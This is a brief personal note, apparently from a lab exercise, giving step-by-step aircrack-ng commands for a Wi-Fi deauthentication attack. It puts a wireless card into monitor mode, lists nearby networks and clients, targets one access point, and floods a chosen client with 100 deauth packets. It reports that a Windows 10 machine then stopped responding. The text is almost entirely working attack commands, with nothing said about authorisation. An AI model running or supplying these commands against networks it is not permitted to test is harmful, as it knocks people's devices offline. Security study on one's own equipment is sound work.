Deauthenticating Wireless Host

Check wireless card in monitoting mode to detect hosts in local area

airmon-ng start wlan0

then get it to listen to the wireless traffic to see whats active

airodump-ng wlan0mon

This displays: -

  • networks at the top

  • clients at the bottom

Set the wireless card to a specific MAC

airodump-ng wlan0mon -c 8 --bssid [MAC ADDRESS]

Aireplay will disconnect it from the network

-a access point

-c Station Physical Address

-0 de-authentication (with 100 packets)

aireplay-ng -0 100 -a [MAC] -c [TARGET MAC] wlan0mon

Windows 10 machine stopped responding
